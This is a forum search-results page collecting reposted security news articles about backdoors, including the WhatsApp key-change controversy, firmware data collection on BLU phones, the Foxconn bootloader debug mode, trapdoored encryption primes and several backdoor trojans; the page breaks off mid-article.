Welcome to nsane.forums

Welcome to nsane.forums, like most online communities you need to register to view parts of our community or to make contributions, but don't worry: this is a free and simple process that requires minimal information. Be a part of nsane.forums by signing in or creating an account.

  • Access special members only forums
  • Start new topics and reply to others
  • Subscribe to topics and forums to get automatic updates

Search the Community

Showing results for tags 'backdoor'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Site Related
    • News & Updates
    • Site / Forum Feedback
    • Member Introduction
  • News
    • General News
    • FileSharing News
    • Mobile News
    • Software News
    • Security & Privacy News
    • Technology News
  • Downloads
    • nsane.down
  • General Discussions & Support
    • Filesharing Chat
    • Security & Privacy Center
    • Software Chat
    • Mobile Mania
    • Technology Talk
    • Entertainment Exchange
    • Guides & Tutorials
  • Off-Topic Chat
    • The Chat Bar
    • Jokes & Funny Stuff
    • Polling Station

Found 52 results

  1. Explained — What's Up With the WhatsApp 'Backdoor' Story? Feature or Bug! What is a backdoor? By definition: "Backdoor is a feature or defect of a computer system that allows surreptitious unauthorized access to data, " either the backdoor is in encryption algorithm, a server or in an implementation, and doesn't matter whether it has previously been used or not. Yesterday, we published a story based on findings reported by security researcher Tobias Boelter that suggests WhatsApp has a backdoor that "could allow" an attacker, and of course the company itself, to intercept your encrypted communication. The story involving the world's largest secure messaging platform that has over a billion users worldwide went viral in few hours, attracting reactions from security experts, WhatsApp team, and Open Whisper Systems, who partnered with Facebook to implement end-to-end encryption in WhatsApp. Note: I would request readers to read complete article before reaching out for a conclusion. And also, suggestions and opinions are always invited What's the Issue: The vulnerability relies on the way WhatsApp behaves when an end user's encryption key changes. WhatsApp, by default, trusts new encryption key broadcasted by a contact and uses it to re-encrypt undelivered messages and send them without informing the sender of the change. In my previous article, I have elaborated this vulnerability with an easy example, so you can head on to read that article for better understanding. Facebook itself admitted to this WhatsApp issue reported by Boelter, saying that "we were previously aware of the issue and might change it in the future, but for now it's not something we're actively working on changing." What Experts argued: According to some security experts — "It's not a backdoor, rather it’s a feature to avoid unnecessarily re-verification of encryption keys upon automatic regeneration." Open Whisper Systems says — "There is no WhatsApp backdoor," "it is how cryptography works," and the MITM attack "is endemic to public key cryptography, not just WhatsApp." A spokesperson from WhatsApp, acquired by Facebook in 2014 for $16 Billion, says — "The Guardian's story on an alleged backdoor in WhatsApp is false. WhatsApp does not give governments a backdoor into its systems. WhatsApp would fight any government request to create a backdoor." What's the fact: Notably, none of the security experts or the company has denied the fact that, if required, WhatsApp, on government request, or state-sponsored hackers can intercept your chats. What all they have to say is — WhatsApp is designed to be simple, and users should not lose access to messages sent to them when their encryption key is changed. Open Whisper Systems (OWS) criticized the Guardian reporting in a blog post saying, "Even though we are the creators of the encryption protocol supposedly "backdoored" by WhatsApp, we were not asked for comment." What? "...encryption protocol supposedly "backdoored" by WhatsApp…" NO! No one has said it's an "encryption backdoor;" instead this backdoor resides in the way how end-to-end encryption has been implemented by WhatsApp, which eventually allows interception of messages without breaking the encryption. As I mentioned in my previous story, this backdoor has nothing to do with the security of Signal encryption protocol created by Open Whisper Systems. It's one of the most secure encryption protocols if implemented correctly. Then Why Signal is more Secure than WhatsApp? You might be wondering why Signal private messenger is more secure than Whatsapp, while both use the same end-to-end encryption protocol, and even recommended by the same group of security experts who are arguing — "WhatsApp has no backdoor." It's because there is always room for improvement. The signal messaging app, by default, allows a sender to verify a new key before using it. Whereas, WhatsApp, by default, automatically trusts the new key of the recipient with no notification to the sender. And even if the sender has turned on the security notifications, the app notifies the sender of the change only after the message is delivered. So, here WhatsApp chose usability over security and privacy. It’s not about 'Do We Trust WhatsApp/Facebook?': WhatsApp says it does not give governments a "backdoor" into its systems. No doubt, the company would definitely fight the government if it receives any such court orders and currently, is doing its best to protect the privacy of its one-billion-plus users. But what about state-sponsored hackers? Because, technically, there is no such 'reserved' backdoor that only the company can access. Why 'Verifying Keys' Feature Can't Protect You? WhatsApp also offers a third security layer using which you can verify the keys of other users with whom you are communicating, either by scanning a QR code or by comparing a 60-digit number. But here’s the catch: This feature ensure that no one is intercepting your messages or calls at the time you are verifying the keys, but it does not ensure that no one, in the past had intercepted or in future will intercept your encrypted communication, and there is no way, currently, that would help you identify this. WhatsApp Prevention against such MITM Attacks are Incomplete WhatsApp is already offering a "security notifications" feature that notifies users whenever a contact's security code changes, which you need to turn on manually from app settings. But this feature is not enough to protect your communication without the use of another ultimate tool, which is — Common Sense. Have you received a notification indicating that your contact's security code has changed? Instead of offering 'Security by Design,' WhatsApp wants its users to use their common sense not to communicate with the contact whose security key has been changed recently, without verifying the key manually. The fact that WhatsApp automatically changes your security key so frequently (for some reasons) that one would start ignoring such notifications, making it practically impossible for users to actively looking each time for verifying the authenticity of session keys. What WhatsApp should do? Without panicking all one-billion-plus users, WhatsApp can, at least: Stop regenerating users' encryption keys so frequently (I clearly don't know why the company does so). Give an option in the settings for privacy-conscious people, which if turned on, would not automatically trust new encryption key and send messages until manually accepted or verified by users. ...because just like others, I also hate using two apps for communicating with my friends and work colleagues i.e. Signal for privacy and WhatsApp because everyone uses it. Source
  2. WhatsApp Security: Make This Change Right Now! Security researchers found a backdoor in the popular messaging application WhatsApp recently that could allow WhatsApp to intercept and read user messages. Facebook, the owner of WhatsApp, claims that it is impossible to intercept messages on WhatsApp thanks to the services end-to-end encryption. The company states that no one, not even itself, can read what is sent when both sender and recipient use the latest version of the application. It turns out however that there is a way for WhatsApp to read user messages, as security researcher Tobias Boelter (via The Guardian) found out. Update: In a statement sent to Ghacks, a WhatsApp spokesperson provided the following insight on the claim: WhatsApp has the power to generate new encryption keys for users who are not online. Both the sender and the recipient of messages are not made aware of that, and the sender would send any message not yet delivered again by using the new encryption key to protect the messages from third-party access. The recipient of the message is not made aware of that. The sender, only if Whatsapp is configured to display security notifications. This option is however not enabled by default. While WhatsApp users cannot block the company -- or any state actors requesting data -- from taking advantage of the loophole, they can at least activate security notifications in the application. The security researcher reported the vulnerability to Facebook in April 2016 according to The Guardian. Facebook's response was that it was "intended behavior" according to the newspaper. Activate security notifications in WhatsApp To enable security notifications in WhatsApp, do the following: Open WhatsApp on the device you are using. Tap on menu, and select Settings. Select Account on the Settings page. Select Security on the page that opens. Enable "show security notifications" on the Security page. You will receive notifications when a contact's security code has changed. While this won't prevent misuse of the backdoor, it will at least inform you about its potential use. Source Alternate Source - 1: WhatsApp Encryption Has Backdoor, Facebook Says It's "Expected Behaviour" Alternate Source - 2: WhatsApp Backdoor allows Hackers to Intercept and Read Your Encrypted Messages Alternate Source - 3: Oh, for F...acebook: Critics bash WhatsApp encryption 'backdoor' Alternate Source - 4: Your encrypted WhatsApp messages can be read by anyone Alternate Source - 5: How to protect yourself from the WhatsApp 'backdoor' Alternate Source - 6: 'Backdoor' in WhatsApp's end-to-end encryption leaves messages open to interception [Updated] Detailed Explanation of the Issue and Prevention/Alternatives:
  3. Website spreading Gatak-infected keygens (via Symantec) Websites offering free keygens for various enterprise software applications are helping crooks spread the Gatak malware, which opens backdoors on infected computers and facilitates attacks on a company's internal network, or the theft of sensitive information. Gatak is a backdoor trojan that first appeared in 2012. Another name for this threat is Stegoloader, and its main distinctive feature is its ability to communicate with its C&C servers via steganography. Gatak relies on steganography to stain hidden Steganography is the technique of hiding data in plain sight. In the world of cyber-security, steganography is the practice of hiding malicious code, commands, or malware configuration data inside PNG or JPG images. The malware, in this case Gatak, connects to its online C&C server and requests new commands. Instead of receiving an HTTP network requests, for which all security software knows to be on the lookout, the data is sent as an innocuous image, which looks like regular web traffic. The malware reads the image's hidden data and executes the command, all while the local antivirus thinks the user has downloaded an image off the Internet. Keygens for enterprise software spreading Gatak Security firm Symantec says it uncovered a malware distribution campaign that leverages a website offering free keygens for various applications such as: SketchList3D - woodworking design software Native Instruments Drumlab - sound engineering software BobCAD-CAM - metalworking/manufacturing software BarTender Enterprise Automation - label and barcode creation software HDClone - hard disk cloning utility Siemens SIMATIC STEP 7 - industrial automation software CadSoft Eagle Professional - printed circuit board design software PremiumSoft Navicat Premium - database administration software Originlab Originpro - data analysis and graphing software Manctl Skanect - 3D scanning software Symantec System Recovery - backup and data recovery software All of the above are specialized apps, deployed in enterprise environments. The group behind this campaign is specifically targeting users that use these applications at work, but without valid licenses, in the hopes of infecting valuable targets they could hack, steal data from, and possibly sell it on the underground. Keygens don't work, they just infect users with Gatak The keygens distributed via this website aren't even fully-working tools. They just produce a random string of characters, but their purpose is to trick the user into executing the keygen binary just once, enough to infect the victim. The hackers are picky about the companies they target because the security firm has seen second-stage attacks on only 62% of all infected computers. Attackers use Gatak to gather basic information about targets, on which, if they deem valuable, deploy other malware at later stages. In some cases, the hackers also resort to lateral movement on the victim's network, with the attackers manually logging into the compromised PC. Attacks aren't sophisticated, and the hackers only take advantage of weak passwords inside the local network. Symantec says it didn't detect any zero-days or automated hacking tools employed when hackers have attempted to infect other devices on the local network. Gatak infections per industry vertical (via Symantec) Telemetry data shows that 62% of all Gatak infections have been found on computers on enterprise networks. Most of these attacks have targeted the healthcare sector, but it doesn't appear that hackers specifically targeted this industry vertical, as other companies in other verticals were also hit. Attackers might have opted to focus more on healthcare institutions because these organizations usually store more in-depth user data they can steal, compared to the automotive industry, gambling, education, construction, or others. "In some cases, the attackers have infected computers with other malware, including various ransomware variants and the Shylock financial Trojan," Symantec notes in a report. "They may be used by the group when they believe their attack has been uncovered, in order to throw investigators off the scent." Article source
  4. Seriously, you cannot trust anyone these days SECURITY COMPANY Proofpoint has discovered that some bastard blaggards are using the medium of Youtube to sell phishing software to people, and then exploiting those people. It makes you wonder if you can trust anyone these days? If you cannot trust someone who sells something that is designed to steal from people not to steal from you, who can you trust not to steal from you? In the short term, let's assume that we can trust Proofpoint. Proofpoint is pretty upset about its discovery and disappointed to see old hacking techniques making their way onto cats jumping onto things and monkeys sniffing things site YouTube. We guess we should all share its disappointment. Even those of us that have neither sought nor bought a phishing kit on the internet. "Like most other businesses, cybercriminals look for ways to market and distribute their tools effectively while staying under the radar of law enforcement and the security community. Recently, Proofpoint researchers have observed scammers distributing phishing templates and kits via YouTube, complete with how-to videos and links in the video descriptions to the software. In fact, this practice appears to be quite widespread. A simple search for "paypal scama" returns over 114,000 results," said the firm. "There's a catch, though, for criminals downloading the software: a backdoor sends the phished information back to the author. While backdoors on these templates aren't new, the use of YouTube to advertise and distribute them is a new trend." It is not that new though, Proofpoint says that some of the videos have been on YouTube for a few months now, and that this suggests that Youtube does not have anything that automatically scans for this kind of caper. The last laugh is on the original poster because ultimately everything comes back to him, or her. The victims are the victims that have fallen foul of schemes to rob them via Amazon and eBay and other online merchants. Obviously. "Many of the video samples we found on YouTube have been posted for months, suggesting that YouTube does not have an automated mechanism for detection and removal of these types of videos and links. They remain a free, easy-to-use method for the authors of phishing kits and templates to advertise, demonstrate, and distribute their software," concludes Proofpoint. "At the same time, the old adage of ‘honor among thieves' should be taken with a grain of salt, since multiple samples revealed authors including backdoors to harvest phished credentials even after new phishing actors purchased the templates for use in their own campaigns. The real losers in these transactions, though, are the victims who have their credentials stolen by multiple actors every time the kits are used." Article source
  5. In “mistake,” AdUps collected data from BLU Android phones in US. The BLU R1 HD is one of the devices that was backdoored by a Chinese software provider. Security firm Kryptowire has uncovered a backdoor in the firmware installed on low-cost Android phones, including phones from BLU Products sold online through Amazon and Best Buy. The backdoor software, initially discovered on the BLU R1 HD, sent massive amounts of personal data about the phones and their users’ activities back to servers in China that are owned by a firmware update software provider. The data included phone number, location data, the content of text messages, calls made, and applications installed and used. The company, Shanghai AdUps Technologies, had apparently designed the backdoor to help Chinese phone manufacturers and carriers track the behavior of their customers for advertising purposes. AdUps claims its software runs updates for more than 700 million devices worldwide, including smartphones, tablets, and automobile entertainment systems. It is installed on smartphones from Huawei and ZTE sold in China. The surveillance feature of the software was developed specifically for the Chinese market, the company says, and was unintentionally included in the software for BLU devices. A lawyer for the company told The New York Times that the data was not being collected for the Chinese government, stating, “This is a private company that made a mistake.” The backdoor was part of the commercial Firmware Over The Air (FOTA) update software installed on BLU Android devices provided as a service to BLU by AdUps. In a report on the finding, a Kryptowire spokesperson said: These devices actively transmitted user and device information including the full-body of text messages, contact lists, call history with full telephone numbers, unique device identifiers including the International Mobile Subscriber Identity (IMSI) and the International Mobile Equipment Identity (IMEI). The firmware could target specific users and text messages matching remotely defined keywords. The firmware also collected and transmitted information about the use of applications installed on the monitored device, bypassed the Android permission model, executed remote commands with escalated (system) privileges, and was able to remotely reprogram the devices... The firmware that shipped with the mobile devices and subsequent updates allowed for the remote installation of applications without the users' consent and, in some versions of the software, the transmission of fine-grained device location information. The transmissions were discovered by Kryptowire in lab testing. The company immediately notified Google, BLU, AdUps, and Amazon—which is the exclusive retailer of the BLU R1 HD—of its findings. The user data was sent in JavaScript Object Notation (JSON) format to a number of servers, all with the hostname bigdata: bigdata.adups.com, bigdata.adsunflower.com, bigdata.adfuture.cn, and bigdata.advmob.cn. The data collection and transmission capability is spread across different applications and files. Text message data (encrypted with DES, which Kryptowire researchers were able to recover the key for) and call log information were sent back every 72 hours. Other data, including location data and app use, was sent every 24 hours. A BLU spokesperson told Ars that the software backdoor affected a “limited number of BLU devices” and that the “affected application has since been self-updated and the functionality verified to be no longer collecting or sending this information.” According to The New York Times report, BLU reported about 120,000 devices were affected and patched. Article source
  6. Microsoft Corp, still stung by accusations that it installed "back doors" for the U.S. government to access customers' communications, opened a center in Brazil on Wednesday where officials will be able to inspect its programming code, in an attempt to allay suspicions in the region that its software programs are vulnerable to spying. Behind reinforced walls and with strict security settings, the world's biggest software company showed off its fourth 'Transparency Center' in Brasilia, where experts from Latin American and Caribbean governments will be able to view the source code of its products. The effort to build trust follows heightened suspicions in the region after former U.S. National Security Agency contractor Edward Snowden leaked documents in 2013 that showed the agency was capturing massive amounts of data from emails handled by major U.S. technology companies, including Microsoft. The leak, in addition to another Snowden disclosure that the United States had been spying on communications including those of former Brazilian President Dilma Rousseff, prompted Brazil and other governments around the world to reconsider how much they could trust U.S. technology companies not to install back doors at the request of U.S. intelligence agencies. At the new site, visited on Wednesday by officials including the speaker of Brazil's Congress, no electronics will be allowed into the secure viewing room. Microsoft prevents anyone from copying the massive amount of coding on display - as much as 50 million lines for its email and server products. Viewers inspect copies of source code on computers connected only to local servers and cut off from the internet. The copies are later deleted. Viewers can use software tools to examine the code, Microsoft said, but it was not immediately clear whether experts would be able to run deep code analysis necessary to uncover back doors or other bugs. It is by no means certain the effort by Microsoft will diminish concerns about spying, but Brazil's reaction to the generally secretive software company opening up its code was initially positive. "This center is aimed at showing that there are no traps, it is a good step," a Brazilian government official, who asked not to be named because he was not authorized to speak about cyber security, told Reuters. The Brasilia facility is Microsoft's fourth transparency center after the NSA scandal. It set up the first one at its Redmond, Washington headquarters in the United States in 2014, one in Brussels last year and one in Singapore earlier this month. It will soon open another in Beijing. The centers allow for face-to-face discussions between government experts and developers. "Governments can verify for themselves that there are no back doors," said Mark Estberg, senior director of Microsoft's global government security program. Article source
  7. Pork Explosion backdoor affects Foxconn-made devices Some Android devices that contain firmware created by Foxconn may be vulnerable via a debugging feature left inside the OS bootloader, which acts as a backdoor and bypasses authentication procedures for any intruder with USB access to a vulnerable phone. Foxconn is a Taiwanese company that assembles the electronic parts of several Android smartphone manufacturers (OEMs). The reason this backdoor exists in the bootloader, the piece of code responsible for booting up the Android OS, is because various OEMs allow Foxconn to create and supply firmware for some of the electronics they use to glue all the parts of an Android device together. Foxconn debugging feature acts as a backdoor Jon Sawyer, a US security expert, discovered at the end of August that this firmware included support for booting up Android devices without having to go through the proper authentication procedure. The researcher says that someone with physical access to the device, could connect it via USB to a computer, and use specific software to interact with the device during its boot-up procedure. This kind of software is most likely a Foxconn debugger, but Sawyer was able to craft his own client and run the commands to enter this "factory test mode." This test mode (aka backdoor) can be accessed via Fastboot, a protocol for handling boot-up commands. Sawyer says that the boot-up command to access the backdoor is "reboot-ftm," and can only be sent to the device using custom software, and not through Android or OEM-specific Fastboot interfaces. "While it is obviously a debugging feature, it is a backdoor," Sawyer says, "it isn’t something we should see in modern devices, and it is a sign of great neglect on Foxconn’s part." Backdoor accessible via USB, disables SELinux But it gets even worse. When entering this factory test mode, Sawyer says the user is "root," with total control over the phone, and that SELinux, a major Android security component, is completely disabled. "In short, this is a full compromise over usb, which requires no logon access to the device," Sawyer says. "This vulnerability completely bypasses authentication and authorization controls on the device. It is a prime target for forensic data extraction." "Due to the ability to get a root shell on a password protected or encrypted device, Pork Explosion would be of value for forensic data extraction, brute forcing encryption keys, or unlocking the boot loader of a device without resetting user data. Phone vendors were unaware this backdoor has been placed into their products," Sawyer adds. Unknown number of devices affected This backdoor, which he (weirdly) named Pork Explosion, affects a large number of devices. Unfortunately, there isn't a list of affected OEMs and smartphone models at the time of writing. Sawyer has provided the following information on how to detect Android devices affected by Pork Explosion. Source: http://news.softpedia.com/news/backdoor-discovered-in-some-foxconn-made-android-smartphones-509271.shtml#sgal_0
  8. Researchers warn about the use of standardized or hard-coded primes in existing cryptosystems Researchers warn that many 1024-bit keys used to secure communications on the internet today might be based on prime numbers that have been intentionally backdoored in an undetectable way. Many public-key cryptography algorithms that are used to secure web, email, VPN, SSH and other types of connections on the internet derive their strength from the mathematical complexity of discrete logarithms -- computing discrete logarithms for groups of large prime numbers cannot be efficiently done using classical methods. This is what makes cracking strong encryption computationally impractical. Most key-generation algorithms rely on prime parameters whose generation is supposed to be verifiably random. However, many parameters have been standardized and are being used in popular crypto algorithms like Diffie-Hellman and DSA without the seeds that were used to generate them ever being published. That makes it impossible to tell whether, for example, the primes were intentionally "backdoored" -- selected to simplify the computation that would normally be required to crack the encryption. Researchers from University of Pennsylvania, INRIA, CNRS and Université de Lorraine recently published a paper in which they show why this lack of cryptographic transparency is problematic and could mean that many encryption keys used today are based on backdoored primes without anyone -- aside from those who created them -- knowing. To demonstrate this, the researchers created a backdoored 1024-bit Diffie-Hellman prime and showed that solving the discrete log problem for it is several orders of magnitude easier than for a truly random one. "Current estimates for 1024-bit discrete log in general suggest that such computations are likely within range for an adversary who can afford hundreds of millions of dollars of special-purpose hardware," the researchers said in their paper. "In contrast, we were able to perform a discrete log computation on a specially trapdoored prime in two months on an academic cluster." The problem is that for someone who doesn't know about the backdoor, demonstrating that a prime has been trapdoored in the first place would be nearly impossible. "The near universal failure of implementers to use verifiable prime generation practices means that use of weak primes would be undetectable in practice and unlikely to raise eyebrows." This is conceptually similar to the backdoor found in the Dual_EC random number generator, which is believed to have been introduced by the U.S. National Security Agency. However, that backdoor was much easier to find and, unlike Diffie-Hellman or DSA, Dual_EC never received widespread adoption. Diffie-Hellman ephemeral (DHE) is slowly replacing RSA as the preferred key exchange algorithm in TLS due to its perfect forward secrecy property that's supposed to keep past communications secure even if the key is compromised in the future. However, the use of backdoored primes would defeat that security benefit. Furthermore, 1024-bit keys are still widely used online, despite the U.S. National Institute of Standards and Technology recommending a transition to larger key sizes since 2010. According to the SSL Pulse project, 22 percent of the internet's top 140,000 HTTPS-enabled websites use 1024-bit keys. "Our results are yet another reminder that 1024-bit primes should be considered insecure for the security of cryptosystems based on the hardness of discrete logarithms," the researchers said. "The discrete logarithm computation for our backdoored prime was only feasible because of the 1024-bit size, and the most effective protection against any backdoor of this type has always been to use key sizes for which any computation is infeasible." The researchers estimate that performing similar computations for 2048-bit keys, even with backdoored primes, would be 16 million times harder than for 1024-bit keys and will remain infeasible for many years to come. The immediate solution is to switch to 2048-bit keys, but in the future all standardized primes should be published together with their seeds, the researchers said. Documents leaked in 2013 by former NSA contractor Edward Snowden suggested that the agency has the ability to decrypt a lot of VPN traffic. Last year, a group of researchers speculated that the reason for this was the widespread use in practice of a small number of fixed or standardized groups of primes. "Performing precomputation for a single 1024-bit group would allow passive eavesdropping on 18% of popular HTTPS sites, and a second group would allow decryption of traffic to 66% of IPsec VPNs and 26% of SSH servers," the researchers said in their paper at that time. "A close reading of published NSA leaks shows that the agency’s attacks on VPNs are consistent with having achieved such a break." Article source
  9. Trojan steals app and database passwords, PoS data Log of recent attacks against the RDP port of a honeypot server A new malware family called Trojan.sysscan has the potential to wreak havoc in enterprise networks that feature poorly protected RDP servers. Discovered by security firm Guardicore, attackers utilize this malware as a backdoor trojan, collecting data from compromised hosts, and exfiltrating it to an attacker's remote server. Attacker infects systems after RDP brute-force attacks Targeted systems are infected after the attacker scans the Internet for open RDP ports, which he brute-forces using common username and password combinations. Poorly secured servers are the optimal targets, and because RDP servers are commonly found in medium-to-large enterprise networks, companies have the most to fear from this new threat. According to Guardicore, this new trojan is coded in the Delphi programming language and comes with support for dumping passwords from locally installed applications such as browsers, databases, and PoS software. The trojan contains specific functions to target credentials used for accounts on banking, gambling and tax websites. It will also target and steal browser cookie files. Two IP addresses used in recent attacks The trojan sets up a hidden administrator account on compromised systems in order to gain boot persistence and makes sure to leave the RDP open for future connections. Guardicore says Trojan.sysscan contains code to search and identify when the trojan is executed in sandbox environments and virtual machines. Nevertheless, the trojan only detects the presence of these environments and fails to take any action to stop execution or hide its activity. The data the trojan collects is sent via an unencrypted HTTP request to a remote server. If the transfer fails, often times, the attacker logs in via RDP and copies the data manually. Security experts say that during this recent wave of Trojan.sysscan attacks, the threat actor behind the malware has used two IPs: 85.93.5.43 (UAE) to store the stolen data, and 144.76.137.166 (Germany) to scan for open RDP ports. Article source
  10. Security researcher Pierre Kim has unearthed a bucketload of vulnerabilities affecting the LTE router/portable wireless hotspot D-Link DWR-932. Among these are backdoor accounts, weak default PINs, and hardcoded passwords. Kim went searching for them after he previously poked around some Quanta LTE routers and also found a huge number of flaws, and a D-Link DWR-932 user noted that the two router types have many similarities. In fact, he says that D-Link’s router is based on the Quanta models, and inherited some of the vulnerabilities. The documented D-Link DWR-932 vulnerabilities affect the latest available firmware. Kim first responsibly disclosed them to the D-Link Security Incident Response Team in June, but after the company said early this month that they don’t have a schedule for a firmware release, he decided to go public with the details about some of the flaws. In short, the firmware sports: Two backdoor accounts with easy-to-guess passwords that can be used to bypass the HTTP authentication used to manage the router A default, hardcoded Wi-Fi Protected Setup (WPS) PIN, as well as a weak WPS PIN generation algorithm Multiple vulnerabilities in the HTTP daemon Hardcoded remote Firmware Over The Air credentials Lowered security in Universal Plug and Play, and more. “At best, the vulnerabilites are due to incompetence; at worst, it is a deliberate act of security sabotage from the vendor,” says Kim, and advises users to stop using the device until adequate fixes are provided. “As the router has a sizable memory (168 MB), a decent CPU and good free space (235 MB) with complete toolkits installed by default (sshd, proxy, tcpdump …), I advise users to trash their routers because it’s trivial for an attacker to use this router as an attack vector (ie: hosting a sniffing tool, LAN hacking, active MiTM tool, spamming zombie),” he noted. The router is still being sold and used around the world. Article source
  11. Xiaomi Can Silently Install Any App On Your Android Phone Using A Backdoor Do you own an Android Smartphone from Xiaomi, HTC, Samsung, or OnePlus? If yes, then you must be aware that almost all smartphone manufacturers provide custom ROMs like CyanogenMod, Paranoid Android, MIUI and others with some pre-loaded themes and applications to increase the device's performance. But do you have any idea about the pre-installed apps and services your manufacturer has installed on your device?, What are their purposes? And, Do they pose any threat to your security or privacy? With the same curiosity to find answers to these questions, a Computer Science student and security enthusiast from Netherlands who own a Xiaomi Mi4 smartphone started an investigation to know the purpose of a mysterious pre-installed app, dubbed AnalyticsCore.apk, that runs 24x7 in the background and reappeared even if you delete it. Xiaomi is one of the world's largest smartphone manufacturers, which has previously been criticized for spreading malware, shipping handsets with pre-loaded spyware/adware and forked version of Android OS, and secretly stealing users' data from the device without their permission. Xiaomi Can Silently Install Any App On your Device After asking about the purpose of AnalyticsCore app on company’s support forum and getting no response, Thijs Broenink reverse engineered the code and found that the app checks for a new update from the company's official server every 24 hours. While making these requests, the app sends device identification information with it, including phone's IMEI, Model, MAC address, Nonce, Package name as well as signature. If there is an updated app available on the server with the filename "Analytics.apk," it will automatically get downloaded and installed in the background without user interaction. Now the question is, Does your phone verify the correctness of the APK, and does it make sure that it is actually an Analytics app? Broenink found that there is no validation at all to check which APK is getting installed to user's phone, which means there is a way for hackers to exploit this loophole. This also means Xiaomi can remotely and silently install any application on your device just by renaming it to "Analytics.apk" and hosting it on the server. Hackers Can Also Exploit This Backdoor Since the researcher didn't find the actual purpose of the AnalyticsCore app, neither on Googling nor on the company's website, it is hard to say why Xiaomi has kept this mysterious "backdoor" on its millions of devices. As I previously said: There is no such backdoor that only its creator can access. So, what if hackers or any intelligence agency figure out how to exploit this backdoor to silently push malware onto millions of Xiaomi devices within just 24 hours? Ironically, the device connects and receive updates over HTTP connection, exposing the whole process to Man-in-the-Middle attacks. Even on the Xiaomi discussion forum, multiple users have shown their concerns about the existence of this mysterious APK and its purpose. How to Block Secret Installation? As a temporary workaround, Xiaomi users can block all connections to Xiaomi related domains using a firewall app. No one from Xiaomi team has yet commented on its forum about the question raised by Broenink. We'll update the story as soon as we heard from the company. Meanwhile, if you are a Xiaomi user and has experienced anything fishy on your device, hit the comments below and let us know. Source
  12. Trojan can steal passwords, log keystrokes Two spam email samples spreading the new trojan Bitdefender security researchers say they've uncovered a spam flood spreading booby-trapped Microsoft Publisher (PUB) files laced with a new trojan that opens a backdoor on infected computers. The company says it detected a few thousands of these emails in a short period, all containing .pub files attached to the email messages. The spam itself claimed to come from various brands in the UK and China and tried to pass as orders and invoices. PUB file -> VBScript -> AutoIt script -> Backdoor Trojan The attached PUB file, when opened, would trigger a VBScript that downloads a self-extracting cabinet (CAB) file on the user's PC. This file contains an AutoIt script, a tool for running the AutoIt script, and a file encrypted with the AES-256 algorithm. Bitdefender's team noticed that a string from the AutoIt script serves as the decryption key for the latter file. The encrypted file is actually a backdoor trojan that allows crooks to connect to the infected PC. Trojan can log keystrokes, steal passwords This trojan can also log keystrokes, record passwords as they're typed into login forms, dump passwords from browsers and email clients, gather information about the infected system, and more. Bitdefender's team hasn't bothered naming the malware, which is currently detected only as Generic.Malware.SFLl.545292C. The PUB files spreading the trojan are detected in security alerts as W97M.Downloader.EGF. What's strange about this malware distribution campaign is the usage of PUB files, specific to Microsoft's Publisher application, one of the apps included in the Office 365 suite. ".pub is not your typical file format to host malware," Adrian Miron, Head of Antispam Lab at Bitdefender, says. "Spammers have chosen it because people don’t usually associate this type of file with the possibility of infection." Article source
  13. FBI Director Wants 'Adult Conversation' About Backdooring Encryption Coast's clear, boss, no encryption here ... FBI Director James Comey, center How about f**k off – is that adult enough? FBI Director James Comey is gathering evidence so that in 2017 America can have an "adult" conversation about breaking encryption to make crimefighters' lives easier. Speaking at Tuesday's 2016 Symantec Government Symposium in Washington, Comey banged on about his obsession with strong cryptography causing criminals to "go dark" and making themselves harder to catch. Comey said that once the election cycle is over, he will be resuming his push to force technology companies to bork their own products, and this time armed with plenty of supporting documentation. "The conversation we've been trying to have about this has dipped below public consciousness now, and that's fine. Because what we want to do is collect information this year so that next year we can have an adult conversation in this country," he said, AP reports. "We want to lock some people up, so that we send a message that it's not a freebie to kick in the door, metaphorically, of an American company or private citizen and steal what matters to them. And if we can't lock people up, we want to call (them) out. We want to name and shame through indictments, or sanctions, or public relation campaigns – who is doing this and exactly what they're doing." Americans do have the right to a measure of privacy in their own homes, cars, or on their electronic devices, he said. But the government also has the right to invade that privacy when law enforcement feels it has probable cause. Comey referenced the Apple case, where the FBI tried to force Tim Cook's company to build a version of iOS that could bypass the security systems of an iPhone used by the San Bernardino terrorist. The FBI backed down after a third party proved able to get into the handset, and nothing of note was found on it. But Comey isn't giving up in his quest to introduce a backdoor in encryption systems, or a front door as he prefers to call it. This despite the NSA and the best minds in the crypto business pointing out that it's mathematically impossible to build such an access mechanism that can't be found and exploited by others. Comey, and others, seem to think that it is possible, despite offering no evidence to support this view. Instead they want to force the technology industry to invent a way to make it possible for them to defeat encryption. Even supposing such a system was possible and police got a golden key to crypto, there's no guarantee that the method wouldn't leak out. As we saw with the Microsoft Secure Boot fiasco, even the most sensitive golden keys can leak, and a method to break all American crypto systems would be top of the wish list for criminals and foreign powers. Comey's argument is also predicated on the assumption that criminals will only use American crypto systems. At the last count, two-thirds of the crypto systems out there come from outside the Land of the FreeTM and so would be unaffected. US tech firms are, of course, very worried about law enforcement's plans. If implemented, any backdoor would kill their sales, both domestically and internationally. American technology sales have already suffered post-Snowden and selling broken crypto would accelerate this decline. Source
  14. Backdoor Trojan Uses TeamViewer Components to Spy on PCs in Europe, Russia, US Crooks also delivering keyloggers and password stealers The concept is not new by any means, and crooks employed TeamViewer in the past, when they packaged the legitimate app alongside their malware and used it to transform the user's PC into a web proxy. That particular trojan, BackDoor.TeamViewer.49, did not allow the crooks to steal anything, only to spy on traffic, but this newer variant does, according to Dr.Web security researchers. In fact, the two variants seem to be related because they both use stripped-down versions of the TeamViewer application, where they replace the avicap32.dll file with a malicious version that loads trojan's malicious features. Trojan includes many self-defense mechanisms The infection process revolves around users installing applications, where the stripped-down TeamViewer version is also installed without their knowledge. Whenever this modified TeamViewer version starts, the avicap32.dll is loaded by default, being a must-run DLL. Crooks modified this DLL to include the BackDoor.TeamViewerENT trojan, which gets loaded into the computer's memory, without needing any files on disk to function. This fileless operation mode makes antivirus detection harder. The modified DLL also contains functions to suppress any TeamViewer error messages, a functionality included to avoid giving away the trojan's presence. Another odd feature is that, whenever the user starts the Windows Task Manager or Process Explorer apps, the trojan automatically shuts down (the parent TeamViewer process) to avoid getting seen by the victim in the process list. Backdoor trojan includes lots of RAT-looking features After this, BackDoor.TeamViewerENT.1 begins to behave like a regular backdoor. It starts communicating with its C&C server, from where it receives various types of commands. The trojan includes the ability to restart or turn off the computer, remove or relaunch its parent TeamViewer process, listen to conversations via the microphone, access the webcam, download and execute files, run command-line instructions, or connect to specified remote servers. As you can see, these are full-on RAT features. Additionally, Dr.Web says it detected a campaign where crooks used the trojan to download and install other malware like keyloggers and password stealers. During their investigation, security researchers found the trojan was very active, especially targeting Russian users, but also users in the UK, 